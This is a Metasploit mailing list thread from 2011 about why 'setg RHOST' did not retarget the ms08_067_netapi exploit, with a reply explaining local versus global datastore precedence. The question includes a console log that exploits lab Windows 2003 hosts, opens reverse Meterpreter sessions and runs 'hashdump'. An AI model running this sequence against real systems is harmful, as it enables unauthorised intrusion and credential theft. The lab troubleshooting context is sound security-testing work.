Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [RHOST] bug ?

From: Joshua Smith <lazydj98 () gmail com>
Date: Thu, 20 Oct 2011 13:29:16 -0400
Yeah, i'd have to examine the source, but I believe it's something
like (in pseudo code)

ldatastore['RHOST'] || gdatastore['RHOST']

so global datastore is more like the default.  However, if there's no
local, the local becomes the value of global
so when you do the next setg, you're changing the default, however
there's a local defined now, cuz you're using the exact same module
and therefore the module instance hasn't changed, which would
otherwise wipe out the local datastore.

so I think if you changed to a different module, the setg would be all
you needed, but staying in that module you've created a local

I'm not a dev tho, I'm just an avid user ;)

-Josh

On Thu, Oct 20, 2011 at 12:17 PM, cons0ul <sachinshinde11 () gmail com> wrote:

yeah silly me

it happens here

msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
RHOST => 192.168.1.61

its interesting RHOST is global and local variable .... is this
variable overriding ?


thanks,
cons0ul


On Thu, Oct 20, 2011 at 6:37 PM, Joshua Smith <lazydj98 () gmail com> wrote:

No, just use set the second time instead of setg. The global datastore is used if there's nothing in the local 
store, which is the case in your scenario.

-Josh

On Oct 20, 2011, at 4:16 AM, cons0ul <sachinshinde11 () gmail com> wrote:


msf  exploit(ms08_067_netapi) > version
Framework: 4.1.0-release.13988
Console  : 4.1.0-release.13581

:)

On Thu, Oct 20, 2011 at 1:43 PM, cons0ul <sachinshinde11 () gmail com> wrote:

Hi ,

I was just testing smb exploits in our testing lab and this is what i did


msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
RHOST => 192.168.1.61
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.7:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.61
[*] Meterpreter session 1 opened (192.168.1.7:4444 ->
192.168.1.61:1977) at 2011-10-20 13:32:46 +0530

meterpreter > hashdump
meterpreter > background
msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.62
RHOST => 192.168.1.62
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.7:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.61
[*] Meterpreter session 2 opened (192.168.1.7:4444 ->
192.168.1.61:1978) at 2011-10-20 13:33:56 +0530


is it a bug ?

thanks,
cons0ul


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework







-- 
- Josh
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: